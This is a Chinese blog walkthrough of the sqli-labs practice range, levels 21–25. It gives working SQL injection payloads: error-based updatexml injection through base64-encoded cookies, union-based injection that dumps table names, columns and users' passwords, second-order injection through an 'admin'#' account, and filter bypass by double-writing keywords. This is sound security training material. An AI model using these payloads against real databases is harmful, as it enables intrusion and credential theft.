sqli-labs靶场通关攻略（二十一到二十五关）

你不要在理我了

已于 2024-08-22 20:11:27 修改

阅读量578

点赞数 16

文章标签：数据库

于 2024-08-22 20:10:06 首次发布

本文链接：https://blog.csdn.net/2301_81881972/article/details/141436135

版权

sqli-labs-master靶场第二十一关

一，页面输入admin 147258 登录

可以看见这里返回了很多信息，包括了自己的Cookie。但是Cookie却是一串奇怪的字符串，看得出来这是bse64编码。

我们解一下码查看一下bse64编码

二，Burp Suite 抓包，并且把抓到的数据发送到重放器上

三，采用报错注⼊函数获取其当前数据库名称

')and updatexml(1,concat(1,database()),1)#编码

四，查表名

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码

五，查列名

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码

六，查看users表中所有信息

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码

sqli-labs-master靶场第二十二关

一，页面输入admin 147258 登录

可以看见这里返回了很多信息，包括了自己的Cookie。但是Cookie却是一串奇怪的字符串，看得出来这是bse64编码。

二，Burp Suite 抓包，并且把抓到的数据发送到重放器上

三，采用报错注⼊函数获取其当前数据库名称

"and updatexml(1,concat(1,database()),1)#编码

四，查表名

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码

五，查列名

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码

六，查看users表中所有信息

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码

sqli-labs-master靶场第二十三关

一，测试闭合方式

输入单引号报错，但是注释符不管用。猜测注释符被过滤，查看源码果然被注释了，所以我们可以用单引号闭合，发现成功。

?id=1' or '1'='1

二，查看数据库

?id=-1' union select 1,database(),3 or '1'='1

三，查看表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1'='1

四，查列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' or '1'='1

sqli-labs-master靶场第二十四关

二次注入：

一，点击" New User click Here "并注册用户名为 admin'#

二，对注册的账号 admin'# 进⾏登录并修改密码

三，打开数据库查看发现，admin'#密码并没有被改，admin密码被改了

sqli-labs-master靶场第二十五关

页面提示是将or和and这两个替换成空，可以采取双写绕过

一，查看表名

information里面涉及or可以写成infoorrmation

?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

二，查看列

information里面涉及or可以写成infoorrmation

and改为anandd

?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'--+

你不要在理我了

关注

16
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs靶场通关攻略（二十一到二十五关）

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码。')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码。
复制链接

扫一扫